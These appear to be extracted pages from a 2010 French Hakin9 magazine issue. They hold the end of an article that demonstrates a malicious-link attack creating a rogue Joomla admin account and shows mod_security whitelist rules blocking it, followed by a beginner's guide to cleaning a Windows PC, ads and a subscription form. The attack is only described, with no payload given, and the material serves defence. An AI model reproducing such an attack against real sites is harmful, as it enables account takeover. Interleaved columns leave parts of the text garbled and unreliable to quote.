d’informations qu’Apache. Pour cela, il faut
configurer les paramètres suivants :
SecAuditEngine RelevantOnly : seuls
les échanges ayant été détectés sont
enregistrés
SecAuditLog : spécifie le chemin vers
le journal
Voici un exemple de traces que génère
mod_security dans notre situation (cf.
Figure 3).
A ce stade, nous avons un mod_
security2 fonctionnel avec les ModSecurity
Core rules. Notre application web est
donc correctement protégée en liste noire
à condition, bien sûr, de mettre à jour
régulièrement les Core rules. Le but étant
de faire de la liste blanche, nous verrons par
la suite comment orienter la configuration
vers ce mode de fonctionnement. Figure 5. Editeur de règles REMO

3/2010 HAKIN9 71

68_73_____securiteWEB_ok.indd 71 2010-03-10, 16:42:03


SÉCURITÉ RÉSEAUX
dans la partie références de cet article. de bloquer des SQL injection ainsi que filtrage par liste noire, ces règles sont
Vous y trouverez des règles permettant des failles XSS. Pour mettre en place du intéressantes.

Démonstration d'une
Sur Internet attaque sur Joomla
• http://www.howtoforge.com/remo_modsecurity_apache – Un tutorial pour débuter avec REMO. Nous avons réalisé une attaque sur notre
• http://www.modsecurity.org/ – Le site officiel de mod_security. installation de Joomla pour ensuite tester
• http://software.inl.fr/trac/wiki/Ouadjet – Le site de ouadjet. son blocage avec mod_security2.
• http://www.hsc.fr/ressources/breves/modsecurity.html.fr – Un article d'HSC traitant de mod_ Explication de l'attaque :
security.
• http://www.hsc.fr/ressources/breves/relais-inverse.html.fr – Un article d'HSC traitant d'Apache
• 1/ Création d'un utilisateur classique
en relais inverse.
• http://httpd.apache.org/docs/2.0/mod/mod_proxy.html – La documentation officielle de dans Joomla.
mod_proxy. • 2/ Cet utilisateur dépose ensuite
une news dans Joomla avec un lien
contenant cette attaque (Figure 4).
Listing 2. Règles mod_security

# Location au niveau du site joomla Le lien cliquez ici contient du code


<LocationMatch "^/joomla/administrator/index2.php(.*)$"> malveillant que voici (cf Listing 1).
# Traitement de la balise "Referer"
Et lorsqu’un administrateur ira sur cette
SecRule REQUEST_HEADERS:Referer news et cliquera sur le lien, un nouveau
"!^(http://192.168.103.113/joomla/administrator/(.*))$" compte root mechant/mechant se créera
"t:none,deny,id:3,status:501,severity:3,msg:'Header Referer failed
dans la base de données utilisateurs de
# Aucune vérification sur le "Cookie" joomla.
SecRule REQUEST_HEADERS:Cookie "!^(.*)$"
"t:none,deny,id:3,status:501,severity:3,msg:'Header Cookie failed validity Le filtrage par liste blanche
check. Value domain: Custom.'"
L’objectif de la liste blanche est d’interdire
# All checks passed for this path. Request is allowed. ce qui n’est pas explicitement autorisé.
SecAction "allow,id:4,t:none,msg:'Request passed all checks, it is thus Cela peut être assez facile pour une
allowed.'"
application dont les processus sont
</LocationMatch>
<LocationMatch "^/joomla/administrator/(.*)$">
entièrement maitrisés. Cela devient
beaucoup plus compliqué pour une
# traitement de la balise "Referer" en prenant en compte cette fois la application non maîtrisée et relativement
possibilité de venir du fichier index.php
lourde en fonctionnalités. Au vu de la
SecRule REQUEST_HEADERS:Referer
"!^((http://192.168.103.113/joomla/administrator/(.*))|(http://192.168.103.113/j tâche que cela implique, dans le cadre
oomla/index.php(.*)))$" "t:none,deny,id:3,status:501,severity:3,msg:'Header de notre étude, nous ne tenterons pas
Referer failed validity check. Value domain: Custom.'" de protéger l’ensemble de l’application
# Aucune vérification sur le "Cookie"
mais seulement quelques parties du
SecRule REQUEST_HEADERS:Cookie "!^(.*)$" système et, notamment, le protéger
"t:none,deny,id:3,status:501,severity:3,msg:'Header Cookie failed validity contre l’attaque proposée dans la partie
check. Value domain: Custom.'"
précédente.
</LocationMatch>
<LocationMatch "^/joomla/(.*)$"> Nous allons dans un premier temps ne
mettre aucune règle de filtrage et mettre le
# aucun traitement de la balise "Referer" reverse proxy en mode apprentissage afin
SecRule REQUEST_HEADERS:Referer "!^(.*)$"
de loguer au maximum ce qui se passe et
"t:none,deny,id:1,status:501,severity:3,msg:'Header Referer failed validity
check. Value domain: Custom.'" déterminer ensuite les règles de filtrage à
mettre en place. Cette opération terminée,
# Vérifie que le "Cookie" n'existe pas une analyse assez grossière nous permet
SecRule REQUEST_HEADERS:Cookie "(3317646d38c9c47495501e2b9c0a260e=)(.*)$"
"t:none,deny,id:1,status:501,severity:3,msg:'Header Cookie failed validity
d’identifier les grandes règles de filtrage
check. </LocationMatch> permettant à l’application de s’exécuter
au maximum. En effet, cette première
# Bloque tout
opération est assez importante puisque
<LocationMatch "^/.*$">
SecAction "deny,status:501,severity:3,msg:'Unknown request. Access denied by tout ce qui n’est pas explicitement autorisé
fallback rule.'" est interdit. Il convient ainsi d’autoriser un
</LocationMatch> maximum d’éléments nécessaires au bon
fonctionnement de l’application.

72 HAKIN9 3/2010

68_73_____securiteWEB_ok.indd 72 2010-03-10, 16:42:15


Comment filtrer l'attaque Editeur de règles
Le problème de cette attaque réside Le premier outil recommandé (Ouadjet)
dans la légitimité de l’opération réalisée. ne fonctionne que pour la branche 1
Le seul élément qui n’est pas normal d’Apache. Nous l’avons essayé
est le lieu de réalisation du script. En sur la branche 2 de mod_security mais
effet, l’opération de création de compte sans succès. Nous avons donc cherché
utilisateur ne peut être réalisée que un outil pour la branche 2 de mod_security.
depuis l’URL « index2.php » Nous avons Deux outils ont été trouvés. Le premier
donc décidé de filtrer sur l’en-tête HTTP, nous a paru assez austère dans son
la variable « Referer » qui stipule l’url de approche. Le second, REMO, nous a paru
la page demandant à exécuter le script beaucoup plus intéressant dans son
et d’y mettre comme règle : « /joomla/ approche, car il aide l’utilisateur à créer un
administrator/(.*) ». Nous pouvons alors maximum de règles de la manière la plus
constater, qu’effectivement, l’attaque dans précise possible, permettant également
ces conditions n’est plus possible. Dans une compréhension simplifiée de l’en-tête
cette règle, nous ne stipulons pas que la HTTP.
balise Referer est obligatoire, ce qui peut Pour être efficace dans la création de
être considéré comme une vulnérabilité. règles, il convient de bien comprendre
Si cette balise est rendue obligatoire, le fonctionnement du protocole HTTP.
l’authentification à l’application n’est La compréhension des en-têtes est un
plus possible car dans certains cas, élément primordial. Voici en image les
ce champ ne figure pas dans l’en-tête règles que nous avons générées avec
HTTP. Néanmoins, nous partons du REMO (cf. Figure 5).
principe que l’administrateur n’a aucun Et voici ce que cela donne en version
intérêt à intercepter la communication mod_security (cf. Listing 2).
pour changer cette balise. Toujours dans
notre paranoïa permanente, nous nous Conclusion
sommes dit que la page permettant Nous avons vu que la liste blanche est
l’attaque pouvait se trouver derrière un un mécanisme très complexe à mettre
proxy qui modifierait cet en-tête à la en œuvre. La solution consisterait à créer
volée afin de la rendre conforme à la des règles de filtrage par liste blanche
règle de filtrage précédemment mise en pour chaque application web (soit par
place. C’est pourquoi nous avons décidé l’éditeur, soit par une société qui ne
d’ajouter une règle plus contraignante s’occuperait que de cela). Sans cela, la
pour l’administrateur mais qui permettra mise en place d’une liste blanche est
de réduire au maximum ce risque. extrêmement difficile sauf à connaître
parfaitement l’application. La liste noire
Un moyen complémentaire de a donc encore de beaux jours devant elle
filtrage tant que des listes blanches ne seront pas
La deuxième règle consiste à limiter éditées pour chaque application. A moins
l’accès de l’administrateur à son espace qu’un autre outil vraiment performant voit
d’administration et de lui interdire l’accès le jour. Ouadjet pour la branche 2 de
aux pages du site. Cette règle consiste mod_security est en développement. Ivan
donc à interdire explicitement le cookie Ristic, le développeur de mod_security, est
de session « 3317646d38c9c47495501 aussi en train de travailler sur un projet qui
e2b9c0a260e» correspondant au profil consisterait à générer des listes blanches
d’administration aux autres espaces automatiquement mais cela va prendre du
(Location) du site. Le problème est que temps. Patientons…
pour accéder au reste de l’application,
l’administrateur n’aura pas seulement
À propos de l'auteur
besoin de se déloguer, il lui faudra aussi L'auteur travaille en tant qu'ingénieur sécurité chez
fermer son navigateur. En effet, au moment Dimension Data Luxembourg. Son métier consiste
en la conception, la mise en œuvre et le support
du logout de l’application, le cookie est d'architectures de sécurité pour des clients grands
dévalidé dans la base de données mais comptes. Diplômé d'un Master ès Sécurité Informatique
à l'EPITA à Paris, il se passionne pour les technologies de
ne l’est pas au niveau du navigateur. sécurité de l'information.

68_73_____securiteWEB_ok.indd 73 2010-03-11, 13:38:42


DÉBUTANTS
Comment
RÉGIS SENET

nettoyer son
PC ?
Degré de difficulté

Allez allez, prenez tous un balai, un grand sac poubelle et ….


Non en fait, ce n’est pas nécessaire de prendre cela ; nous vous
expliquerons ici comment nettoyer vos PC, informatiquement
parlant bien sûr.

N
ettoyer son PC présente de nombreux Les fichiers se fragmentent à force d’installer/
avantages. Tout d’abord, cela permet de désinstaller des logiciels, supprimer des fichiers,
se débarrasser des parasites, spywares etc.
et autres virus qui nuisent au bon fonctionnement La défragmentation a donc pour fonction de
de votre installation informatique. D’autre part, rendre toute sa fraîcheur au PC. Répétez l’opération
cela permet d’éliminer les fichiers temporaires pour chacun de vos disques si vous en avez
qui, s’ils ne présentent aucun risque pour la plusieurs.
stabilité de votre système, prennent parfois Windows propose un outil de défragmentation
énormément de place sur votre disque dur que vous utilisez d'un clic droit sur le disque dur à
et, par conséquent, réduisent d’autant ses défragmenter, sélectionnez Propriétés et rendez-
performances. vous dans l’onglet Outils.
Fichiers temporaires, en double, corrompus, La défragmentation par l’outil de Windows
inactifs, les éléments à enlever sans risque est une bonne chose mais il n’est pas très
sont légion, sachant qu’ils représentent performant (cf. Figure). En effet, il existe des outils
parfois plusieurs Mo (ou même Go, selon que entièrement dédiés à cela comme Disk Defrag,
nous prenions soin ou non de les éradiquer Diskeeper ou encore l’excellent O&O Defrag (cf
régulièrement). Figure 2).
Toutes les solutions, astuces et logiciels Bien que O&O Defrag soit un shareware, sa
proposées dans cet article sont compatibles tant version 10 est disponible gratuitement à l’adresse
avec XP qu’avec Vista. L’ensemble des installations suivante : http://www.oo-software.com/home/en/
se fera sur un ordinateur équipé de Windows XP special/komputerswiat/
Pro SP3. L’ensemble des outils présentés sera
gratuit.
CET ARTICLE
EXPLIQUE...
La défragmentation
Les méthodes pour nettoyer un
PC infecté Attaquons le vif du sujet en commençant par une
Les méthodes pour éviter de défragmentation du disque dur. La défragmentation
nouvelles infections d’un disque regroupe les fichiers fragmentés pour
optimiser les performances du système. Cette
CE QU'IL FAUT
SAVOIR... opération s’effectue tous les mois ou une fois par
trimestre selon que vous sollicitez beaucoup ou
Aucune connaissance n’est
requise non votre disque dur. Figure 1. Défragmentation avec Windows

74 HAKIN9 3/2010

74_79____nettoyage.indd 74 2010-03-11, 15:10:34


COMMENT NETTOYER SON PC ?

Suppression des fichiers Par défaut, les paramètres avancés Pour modifier manuellement le registre,
inutiles sont désactivés. La plus grande prudence tapez regedit en ligne de commande (cf.
A force d’utilisation, votre ordinateur est de rigueur si vous activez ces cases Figure 4, 5).
à la fâcheuse tendance à garder de car votre système risquerait de devenir Puis validez via Ok.
nombreux fichiers absolument pas instable. En déroulant l’ensemble des listes,
nécessaires. Il s’agit, par exemple, Une fois les bons paramètres vous accédez à toute la base de registre
des fichiers temporaires internet, des sélectionnés, cliquez sur Analyse puis, de l’ordinateur cible.
documents récents, des fichiers dans la celle-ci terminée, sur Lancer le Nettoyage. Cette utilisation de la base de
corbeille, etc. Dans la même catégorie que registre est très efficace mais requiert
Si vous ne supprimez jamais CCleaner, il existe également : une très bonne connaissance en la
l’ensemble de ces petits fichiers, vous EasyCleaner, nCleaner ou encore Disk matière. Nous allons donc préférer
risquez d'avoir à supprimer plusieurs Mo Cleaner l’utilisation de logiciels spécialisés pour
ou Go. faire ce nettoyage.
Au lieu de chercher l’ensemble de Nettoyer la base de registre Nous allons donc utiliser Regseeker
ces fichiers à la main, nous allons faire Le registre de Windows est une base de offrant toute une palette de services
appel à des programmes permettant, données de configuration du système concernant la base de registre.
en un clic, d’éradiquer de votre disque d’exploitation et des divers logiciels L’interface de RegSeeker, même si elle
dur absolument tous les fichiers installés sur l’ordinateur. Elle a la est en anglais, est excessivement simple
indésirables et temporaires. Parmi eux, particularité d'être extrêmement sensible. d’utilisation.
il y a CCleaner. Après chaque installation, de nouvelles Choisissez les clés à analyser puis
CCleaner est vraiment ultra simple entrées s'effectuent dans la base de vérifiez que la case « Backup before
à utiliser. Dans un premier temps, vous registre mais ne se retirent pas forcément deletion » est effectivement activée.
utilisez sa fonction Nettoyeur et éliminez lors des désinstallations. Ensuite, cliquez simplement sur Ok !
toutes les traces et fichiers temporaires de Attention : toute opération sur la base pour lancer le nettoyage automatique (cf.
Windows et de vos diverses applications. de registre requiert une grande vigilance. Figure 6).
A vous de déterminer les applications Il est recommandé de systématiquement Une fois le scan terminé, il est
que vous souhaitez purger et celles faire une sauvegarde préalablement à possible de tout sélectionner en prenant
applications à épargner (cf. Figure 3) toute opération. soin de vérifier que les entrées rouges ne
présentent aucun risque. Si vous avez le
moindre doute quant à leur suppression,
ne supprimez que les entrées vertes (cf.
Figure 7).

Nettoyer vos navigateurs


L’utilisation de vos chers navigateurs
Figure 2. Défragmentation avec O&O Defrag (Firefox, Internet Explorer, Opera etc.)
laisse un nombre très important de traces
sur votre machine. Dans l’ensemble de
ces fichiers, vous trouverez historique des

Figure 4. Accès à la base de registre

Figure 3. Suppression des fichiers inutiles avec CCleaner Figure 5. Base de registre sous Windows

3/2010 HAKIN9 75

74_79____nettoyage.indd 75 2010-03-11, 15:10:45


DÉBUTANTS
pages vues, cookies, fichier temporaire Ensuite, pour éviter au maximum d’avoir Cliquez sur Paramètres pour
etc. à refaire l’ensemble de ces configurations, sélectionner le type de fichiers que
Pour éviter que toutes ces informations paramétrez Internet Explorer. Pour cela, vous souhaitez effacer et ceux que vous
ne se retrouvent sur vos ordinateurs, il est rendez-vous dans Options Internet. Dans souhaitez conserver (cf. Figure 12).
nécessaire de configurer convenablement les parties sécurité et confidentialité, vous Vous pouvez aussi effacer vos traces
vos navigateurs. pouvez régler certains paramètres (cf. à n’importe quel moment en surfant, via
Figure 9 et 10). l’onglet Outils/Effacer mes traces.
Nettoyer vos traces sous
Internet Explorer Nettoyer vos traces sous Les spywares
Il a toujours été assez simple d’effacer vos Firefox Aujourd’hui, Internet regorge de logiciels
traces sous Internet Explorer. Sous IE8, la Sous Firefox, le principe est le espions et malveillants communément
manipulation est aussi facile à réaliser. même, mais vous pouvez également appelés spywares. Ces mouchards
Ouvrez le navigateur puis sélectionnez programmer le logiciel pour qu’il supprime recueillent des informations sur votre disque
les Options Sécurité puis Supprimer automatiquement toute trace de navigation dur et les envoient à une régie publicitaire
l’historique de navigation (cf. Figure 8). Dès sur internet (cf. Figure 11). par exemple.
lors, vous pouvez supprimer les fichiers Pour cela, rendez-vous dans les Il ne s’agit pas réellement de programmes
temporaires, les cookies, l’historique, les Options via le menu Outils. Dans la section dangereux mais ils violent votre vie privée.
données remplies dans les formulaires Vie privée, cochez « Videz l’historique lors Ces applications ayant l’habitude de
ainsi que les mots de passe sauvegardés. de la fermeture de Firefox ». s’installer sur votre PC sans vous demander
votre accord, il est très difficile de s’en
débarrasser sans passer par un logiciel
spécialisé permettant les détecter avant de
les éradiquer.
Il existe un très grand nombre de
logiciels anti-spywares. Chacun s'appuie
sur une base de données de spywares
connus plus ou moins complète.
Pour notre exemple, nous allons
prendre Spybot qui est l’un des plus
connus (cf. Figure 13).
Il existe également Ad Aware qui permet
de réaliser cette opération à merveille (cf.
Figure 14).

Figure 8. Supprimer l’historique de


navigation sous Internet Explorer
Figure 6. Nettoyage de la base de registre avec RegSeeker

Figure 9. Acceptation du niveau de


sécurité sous Internet Explorer

Figure 10. Acceptation du niveau de


Figure 7. Suppression d’éléments inutiles sous RegSeeker sécurité sous Internet Explorer

76 HAKIN9 3/2010

74_79____nettoyage.indd 76 2010-03-11, 15:10:56


COMMENT NETTOYER SON PC ?

Les malwares • Les virus. Un virus est un programme avec les vers qui sont des programmes
Voici la dernière catégorie et non pas la capable de se propager à d'autres capables de se propager et de se
moindre, il s’agit des Malwares. Certains ordinateurs en s'insérant dans des dupliquer par leurs propres moyens
d’entre vous sont peut être en train de programmes légitimes appelés hôtes. sans contaminer de programme hôte.
sauter sur leur siège en se disant « Mais il En plus de se reproduire, un virus peut • Les vers (worms). Le ver est un
n’a pas parlé des virus !!!!! ». effectuer d'autres actions susceptibles programme qui se répand par courrier
Par définition, le terme Malware signifie de nuire à l'utilisateur de l'ordinateur électronique en profitant des failles
Logiciel malveillant et donc, inclut les virus infecté ou à d'autres utilisateurs reliés des logiciels de messagerie. Dès
ainsi que les vers. par réseau à l'ordinateur infecté. Les qu'un ver a infecté un ordinateur, il
Par définition (Cf Wikipédia) virus ne doivent pas être confondus tente d'infecter d'autres ordinateurs en
s'envoyant lui-même à des adresses
contenues dans le carnet d'adresses
de l'ordinateur infecté.

Figure 12. Choix des parametres


d’effacement des données sous Firefox

Figure 13. Elimination des mouchards


Figure 11. Fenetre d’option de configuration sous Firefox avec Spybot - Search & Destroy

P U B L I C I T É

3/2010 HAKIN9 77

74_79____nettoyage.indd 77 2010-03-11, 15:11:07


DÉBUTANTS
Parce que les virus ont été historiquement Nous allons donc installer un logiciel à cliquer sur l’onglet Mise à jour puis
les premiers logiciels malveillants, le terme anti-virus. Il en existe des dizaines et des télécharger l’ensemble des mises à jour
« virus » est souvent employé abusivement, dizaines (cf. Figure 15). disponibles (cf. Figure 16).
spécialement par les media, pour désigner Nous allons donc installer AVG Anti- Pour une meilleure protection, il est
toutes sortes de logiciels malveillants. Le virus qui est un logiciel antivirus libre et nécessaire d’activer l’analyse programmée
logiciel antivirus renforce cette utilisation gratuit de l’ordinateur afin de vérifier régulièrement
abusive puisque son objectif n'a jamais été Il est important que ce dernier soit que rien ne traine sur votre ordinateur.
limité aux virus. continuellement à jour. Pour cela, n’hésitez En complètement d’AVG, nous
installerons un logiciel dit d’anti-malware,
il s’agit de Malwarebytes' Anti-Malware
qui se trouve en version gratuite et version
payante. La version gratuite est très
largement suffisante pour l’analyse de
votre machine.
Comme pour AVG Anti-virus, il
est nécessaire que ce logiciel soit
continuellement à jour car de nouvelles
menaces apparaissent tous les jours (cf.
Figure 17).
Pour éviter tout conflit voire plus,
n'installez pas plusieurs logiciels réalisant
les mêmes actions de protection sur votre
ordinateur.
Si un fichier vous paraît suspect mais
que votre antivirus ne le détecte pas, au
Figure 14. Elimination des mouchards avec Ad-Aware lieu d’en installer un autre ou plus, faites
analyser votre fichier en ligne.
Voici le résultat après l’envoi d’un
Linkographie fichier. D’après 41 antivirus, ce fichier est
Défragmenter votre disque :
inoffensif.
• http://www.auslogics.com/en/software/disk-defrag/ - Disk Defrag
• http://www.diskeeper.com/ - Diskeeper Conclusion
• http://www.perfectdisk.com/ - Perfect Disk La mise à jour régulière de l’ensemble de
• www.oo-software.com/ - O&O Defrag votre ordinateur et la suppression de tous
Nettoyer votre disque dur : les fichiers inutiles et dangereux permet
de gagner en vitesse, stabilité ainsi que
• http://www.ccleaner.com/ - Ccleaner sécurité du système.
• http://personal.inet.fi/business/toniarts/ecleane.htm – EasyCleaner Donc, n’hésitez pas à maintenir vos
• http://www.nkprods.com/ncleaner/ - nCleaner
logiciels à jour et à régulièrement refaire
• http://www.diskcleaner.nl/ - Disk Cleaner
les mêmes actions.
Nettoyer le registre : NB. Le reste de Figures, vous allez
pouvoir télécharger via le site officiel de
• http://www.hoverdesk.net/freeware.htm - Regseeker
Hakin9 : www.hakin9.org/fr
• http://www.worldstart.com/weekly-download/archives/reg-cleaner4.3.htm – RegCleaner
• http://www.regclean.com/ - RegClean

Anti-spywares :

• http://www.lavasoft.fr - Ad Aware
• http://www.safer-networking.org/index2.html - SpyBot

Analyseur en ligne : A propos de l’auteur


Régis SENET est étudiant en cinquième année à l’école
Supérieur d’informatique Supinfo. Passionné par les tests
• http://www.virustotal.com/ - Virus Total d’intrusion et les vulnérabilités web, il tente de découvrir
• http://scanner.novirusthanks.org/ - Multi-Engine Antivirus Scanner la sécurité informatique d’un point de vue entreprise. Il
• http://www.virscan.org/ - Virscan s'oriente actuellement vers les certifications Offensive
Security et CEH.
• http://www.filterbit.com/ - Filterbit Contact : regis.senet@supinfo.com
Site internet : http://www.regis-senet.fr

78 HAKIN9 3/2010

74_79____nettoyage.indd 78 2010-03-11, 15:13:04


74_79____nettoyage.indd 79 2010-03-11, 15:11:31
w

SecureIP Solutions
La sécurité de l’information est une chose importante pour les entreprises et même
pour les particuliers. C’est pourquoi SecureIP Solutions vous propose différents
produits et services pour protéger vos précieuses données tels qu’un service de
sauvegarde en ligne, les différents produits BitDefender et bien plus encore.
http://www.secureip.ca

NUMERANCE
NUMERANCE, Spécialisée dans la sécurité informatique, intervient auprès des
Petites et Moyennes Entreprises, en proposant des prestations d’audit, d’accompa-
gnement, et de formation.
http://www.numerance.fr

Hervé Schauer Consultants


Hervé Schauer Consultants : 17 ans d'expertise en Sécurité des Systèmes d'Infor-
mation Nos formations techniques en sécurité et ISO27001 sont proposées à Pa-
ris, Toulouse, et Marseille. http://www.hsc.fr/services/formations/cataloguehsc.pdf
Informations : formations@hsc.fr - +33 (0)141 409 704
Pour plus de renseignement : hakin9@hakin9.org

TippingPoint
TippingPoint est un leader mondial dans la prévention des intrusions réseaux
(Network IPS) de 50Mbps à 10Gigabits ainsi que la vérification d’intégrité de po-
ste et le contrôle d’accès du réseau (NAC).
Tél : 01 69 07 34 49, E-mail : francesales@tippingpoint.com
http://www.tippingpoint.com

Sysdream
Cabinet de conseil et centre de formation spécialisé en sécurité informatique. L’e-
xpérience c'est avant tout les recherches publiques, visant à améliorer la sécurité
des applications et des systèmes d’informations. Les résultats disponibles sur des
portails de recherche, dans la presse spécialisés.
http://www.sysdream.com

MICROCOMS
Microcoms est une société spécialisée dans les produits Microsoft qui a pour
vocation d'aider les particuliers, les TPE-PME et les professions libérales sur 6
axes principaux de l'informatique : Assister, Dépanner, Conseiller, Sécuriser, For-
mer, Maintenir.
Tél. : 01.45.36.05.81
e-mail : contact@microcoms.net
http://www.microcoms.net
Club .PRO

ALTOSPAM
Ne perdez plus de temps avec les spams et les virus. Sécurisez simplement vos
emails professionnels. ALTOSPAM est un logiciel externalisé de protection de la
messagerie électronique : anti-spam, anti-virus, anti-phishing, anti-scam...
Testez gratuitement notre service, mis en place en quelques minutes.
http://www.altospam.com OKTEY – 5, rue du Pic du Midi – 31150 GRATENTOUR

80___Club_PRO.indd 40 2010-03-10, 16:52:15


BULLETIN D’ABONNEMENT
Merci de remplir ce bon de commande et de nous
le retourner par fax : (+48) 22 244 24 59

comment se dèfendre
ou par courrier :

Software Press Sp. z o. o. SK


Bokserska 1, 02-682 Varsovie, Pologne
Tel. (00 33) 09.75.180.358
E-mail : abo_fr@software.com.pl

Prénom/Nom ........................................................................................

Entreprise .............................................................................................

Adresse .................................................................................................

................................................................................................................

Code postal ..........................................................................................

Ville ........................................................................................................

Téléphone .............................................................................................

Fax .........................................................................................................

Je souhaite recevoir l'abonnement à partir du numéro ....................

................................................................................................................

En cadeau je souhaite recevoir .......................................................

................................................................................................................

E-mail (indispensable pour envoyer la facture) ................................

................................................................................................................

PRIX D’ABONNEMENT
À HAKIN9 COMMENT SE DÉFENDRE : 35 €
Je règle par :
 Carte bancaire n° CB

   


code CVC/CVV 

expire le _______________ date et signature obligatoires

Abonnez-vous type de carte (MasterCard/Visa/Diners Club/Polcard/ICB)

et recevez
un cadeau !
Virement bancaire :
Nom banque :
Nordea Bank Polska S.A.
banque guichet numéro de compte clé
IBAN : PL 55 1440 1101 0000 0000 1018 8113
Adresse Swift (Code BIC) : NDEAPLP2

81_prenumerata.indd 71 2010-03-10, 16:52:43


EN JUILLET 2010
Dans le prochain numéro
Toute l'actualité du prochain numéro sur le site www.hakin9.org/fr.

DOSSIER ATTAQUE
Cloud Hosting • CISCO
• XSHM

Vous souhaitez collaborer a la rédaction des articles?


N`hésitez pas á nous contacter!
FR@HAKIN9.ORG

Ce numéro sera disponible en janvier.

La rédaction se réserve le droit de modifier le contenu de la revue.

Le bimestriel hakin9 est publié par Parc d’activités de Chesnes, 55 bd de la Noirée Abonnement (France métropolitaine, DOM/TOM) :
Software Press Sp. z o. o. SK BP 59 F - 38291 SAINT-QUENTIN-FALLAVIER 1 an (soit 6 numéros) 35 €
CEDEX La rédaction fait tout son possible pour s’assurer
(c) 2009 Software Press Sp. z o. o. SK, tous les que les logiciels sont à jour, elle décline toute
Président de Software Press Sp. z o. o. SK: droits réservés responsabilité pour leur utilisation. Elle ne fournit
Paweł Marciniak pas de support technique lié à l’installation ou
Directrice de la publication: Ewa Lozowicka Béta-testeurs : Didier Sicchia, l’utilisation des logiciels enregistrés sur le CD-ROM.
Redacteur en chef: Aneta Mazur Pierre Louvet, Anthony Marchetti, Tous les logos et marques déposés sont la
Régis Senet, Paul Amar, Julien Smyczynski, propriété de leurs propriétaires respectifs.
aneta.mazur@hakin9.org
Gregory Vernon, Latorre Christophe, Timotée
Fabrication: Andrzej Kuca
Neullas Le CD-ROM joint au magazine a été testé avec
andrzej.kuca@software.com.pl
AntiVirenKit de la société G Data Software Sp. z o.o.
Les personnes intéressées par la
coopération sont invitées à nous contacter : AVERTISSEMENT
DTP : fr@hakin9.org Les techniques présentées dans les articles ne
Przemysław Banasiewicz
peuvent être utilisées qu’au sein des réseaux
Couverture : Agnieszka Marchocka Préparation du CD : Rafal Kwaśny internes.
Couverture CD : Przemyslaw Banasiewicz Imprimerie, photogravure :
Publicité : publicite@software.com.pl ArtDruk www.artdruk.com La rédaction du magazine n’est pas responsable
Abonnement : abo_fr@software.com.pl Adresse de correspondance : de l’utilisation incorrecte des techniques
Diffusion : Ilona Lepieszka Software Press Sp. z o. o. SK présentées.
Ilona.lepieszka@software.com.pl Bokserska 1, 02-682 Varsovie, Pologne
Dépôt légal : à parution Tél. +48 22 427 32 87, Fax. +48 22 244 24 59 L’utilisation des techniques présentées peut
ISSN : 1731-7037 www.hakin9.org provoquer la perte des données !
Distribution : MLP

La rédaction se réserve le droit de modifier le contenu de la revue

82_zajawka.indd 82 2010-03-11, 10:50:33


83___itrust.indd 1 2010-03-11, 13:43:26
84____wallix.indd 1 2010-03-11, 13:37:08